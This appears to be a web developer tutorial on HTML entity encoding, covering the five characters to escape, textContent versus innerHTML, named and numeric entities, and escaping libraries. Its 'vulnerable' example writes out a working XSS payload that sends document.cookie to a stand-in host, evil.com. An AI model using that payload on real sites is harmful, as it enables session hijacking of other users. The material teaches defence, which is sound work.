
HTML Entity Encoding: Prevent XSS and Display Special Characters

Learn which HTML characters must be escaped, how entity encoding prevents XSS attacks, the difference between named and numeric entities, and how to encode safely in JavaScript.

ToolsVito Team

The Five Characters You Must Always Escape

Any user-supplied content inserted into HTML must have these five characters replaced with their entities:

&   →  &amp;   (must be escaped first, otherwise the & in the other entities gets double-encoded)
<   →  &lt;
>   →  &gt;
"   →  &quot;  (in attribute values)
'   →  &#x27;  (in single-quoted attributes)

Missing even one of these in the wrong context can lead to Cross-Site Scripting (XSS) — where an attacker injects JavaScript that runs in other users' browsers.
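To see why the ampersand has to be replaced first, the following sketch runs the same five replacements in two different orders. The function names are hypothetical and exist only for this comparison.

```javascript
// Hypothetical helpers for illustration; both apply the same five replacements.

// Correct order: ampersand first, then the other four characters.
function escapeAmpFirst(str) {
  return str
    .replace(/&/g, "&amp;")
    .replace(/</g, "&lt;")
    .replace(/>/g, "&gt;")
    .replace(/"/g, "&quot;")
    .replace(/'/g, "&#x27;");
}

// Wrong order: ampersand last, so it re-escapes the "&" inside the
// entities that the earlier replacements just produced.
function escapeAmpLast(str) {
  return str
    .replace(/</g, "&lt;")
    .replace(/>/g, "&gt;")
    .replace(/"/g, "&quot;")
    .replace(/'/g, "&#x27;")
    .replace(/&/g, "&amp;");
}

const input = '<a href="x">Tom & Jerry</a>';

console.log(escapeAmpFirst(input));
// &lt;a href=&quot;x&quot;&gt;Tom &amp; Jerry&lt;/a&gt;

console.log(escapeAmpLast(input));
// &amp;lt;a href=&amp;quot;x&amp;quot;&amp;gt;Tom &amp; Jerry&amp;lt;/a&amp;gt;
```

The second output would render in the browser as literal entity text such as &lt; instead of the original characters.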

How XSS Happens Without Encoding

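// Vulnerable: inserting raw user input into HTML
const name = '<img src="x" onerror="document.location=\'https://evil.com/steal?c=\'+document.cookie">';
document.getElementById("greeting").innerHTML = "Hello, " + name;
// The onerror handler runs as soon as the image fails to load.
// (A <script> tag inserted through innerHTML is parsed but not executed,
// so real payloads typically use event-handler attributes like this one.)

// Safe when you must build an HTML string: escape before inserting
function escapeHtml(str) {
  return str
    .replace(/&/g, "&amp;")
    .replace(/</g, "&lt;")
    .replace(/>/g, "&gt;")
    .replace(/"/g, "&quot;")
    .replace(/'/g, "&#x27;");
}
document.getElementById("greeting").innerHTML = "Hello, " + escapeHtml(name);

// Simpler for plain text: textContent never parses the value as HTML,
// so prefer it over innerHTML whenever you are not inserting markup
document.getElementById("greeting").textContent = "Hello, " + name;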

textContent vs innerHTML

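The safest approach is to use textContent whenever you insert plain text. It treats the value as literal text rather than HTML, so no encoding is needed and any markup in the value is displayed instead of executed. Assigning to innerText is also treated as text, but textContent is the usual default.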

Only use innerHTML when you intentionally want to insert HTML, and only with sanitized content.
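When the markup itself is written by you and only the interpolated values are untrusted, one option is a tagged template that escapes every value automatically. This is a minimal sketch: safeHtml is a hypothetical name, and it only covers values placed in element content or quoted attribute values. It is not a sanitizer for user-supplied HTML, and it does not make URLs, inline scripts, or styles safe.

```javascript
// Same five replacements as escapeHtml above; String() lets it accept non-strings.
function escapeHtml(value) {
  return String(value)
    .replace(/&/g, "&amp;")
    .replace(/</g, "&lt;")
    .replace(/>/g, "&gt;")
    .replace(/"/g, "&quot;")
    .replace(/'/g, "&#x27;");
}

// Hypothetical tagged template: the literal parts pass through unchanged,
// every interpolated value is escaped before being joined in.
function safeHtml(strings, ...values) {
  return strings.reduce(
    (out, part, i) =>
      out + part + (i < values.length ? escapeHtml(values[i]) : ""),
    ""
  );
}

const userName = '<img src=x onerror="alert(1)">';
const markup = safeHtml`<p class="greeting">Hello, ${userName}!</p>`;

console.log(markup);
// <p class="greeting">Hello, &lt;img src=x onerror=&quot;alert(1)&quot;&gt;!</p>
```

The resulting string can be assigned to innerHTML: the paragraph tag is real markup, while the user-supplied value appears as visible text.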

Named vs Numeric Entities

HTML supports three entity formats:

&amp;    ← named entity (human-readable)
&#38;   ← decimal numeric entity
&#x26;  ← hex numeric entity

Named entities only work for defined names. Numeric entities work for any Unicode code point — useful for obscure characters or when a named entity isn't available.
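As a rough illustration of how numeric entities map to code points, the sketch below builds decimal and hex entities with codePointAt. The helper names are hypothetical and not part of any library.

```javascript
// Hypothetical helpers: build a numeric entity from the first code point of ch.
function toDecimalEntity(ch) {
  return `&#${ch.codePointAt(0)};`;
}

function toHexEntity(ch) {
  return `&#x${ch.codePointAt(0).toString(16).toUpperCase()};`;
}

// Replace every non-ASCII code point with a hex entity.
// Array.from iterates by code point, so characters outside the
// Basic Multilingual Plane (emoji, for example) are handled as one unit.
function encodeNonAscii(str) {
  return Array.from(str, (ch) =>
    ch.codePointAt(0) > 0x7f ? toHexEntity(ch) : ch
  ).join("");
}

console.log(toDecimalEntity("&"));        // &#38;
console.log(toHexEntity("&"));            // &#x26;
console.log(toHexEntity("\u{1F600}"));    // &#x1F600;
console.log(encodeNonAscii("caf\u00e9 \u2260 cafe"));
// caf&#xE9; &#x2260; cafe
```

Note that encodeNonAscii leaves the five special characters untouched, so it complements escaping rather than replacing it.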

Common HTML Entities Reference

&nbsp;   non-breaking space
&copy;   © copyright
&reg;    ® registered trademark
&trade;  ™ trademark
&mdash;  — em dash
&ndash;  – en dash
&hellip; … ellipsis
&euro;   € euro
&pound;  £ pound
&laquo;  « left angle quote
&raquo;  » right angle quote
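The table above can be turned into a small lookup that prefers a named entity and falls back to a hex numeric entity for anything else outside ASCII. This is a sketch under stated assumptions: encodeNamed and the NAMED map are hypothetical, the map contains only the entities listed in this section, and the function does not escape the five special characters.

```javascript
// Characters from the reference table, written as escapes to avoid encoding issues.
const NAMED = new Map([
  ["\u00a0", "nbsp"],
  ["\u00a9", "copy"],
  ["\u00ae", "reg"],
  ["\u2122", "trade"],
  ["\u2014", "mdash"],
  ["\u2013", "ndash"],
  ["\u2026", "hellip"],
  ["\u20ac", "euro"],
  ["\u00a3", "pound"],
  ["\u00ab", "laquo"],
  ["\u00bb", "raquo"],
]);

// Hypothetical helper: named entity when known, hex entity for other
// non-ASCII code points, ASCII left as-is.
function encodeNamed(str) {
  return Array.from(str, (ch) => {
    if (NAMED.has(ch)) return `&${NAMED.get(ch)};`;
    const cp = ch.codePointAt(0);
    return cp > 0x7f ? `&#x${cp.toString(16).toUpperCase()};` : ch;
  }).join("");
}

console.log(encodeNamed("\u00a9 Acme\u2122 \u2014 \u20ac5 \u2260 \u00a35"));
// &copy; Acme&trade; &mdash; &euro;5 &#x2260; &pound;5
```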

Server-Side Encoding Libraries

// Node.js (he library)
import he from "he";
he.escape("<script>alert('xss')</script>");
// "&lt;script&gt;alert(&#x27;xss&#x27;)&lt;/script&gt;"
// Note: he.encode() also encodes non-ASCII characters and emits hex references by default.

# Python (built-in html module)
import html
html.escape('<script>alert("xss")</script>')
# '&lt;script&gt;alert(&quot;xss&quot;)&lt;/script&gt;'

// PHP (built-in)
htmlspecialchars($input, ENT_QUOTES | ENT_HTML5, 'UTF-8');

Encode HTML Entities Instantly

Use ToolsVito's HTML Entity Encoder to encode or decode HTML entities in your browser — useful for embedding code samples in HTML.
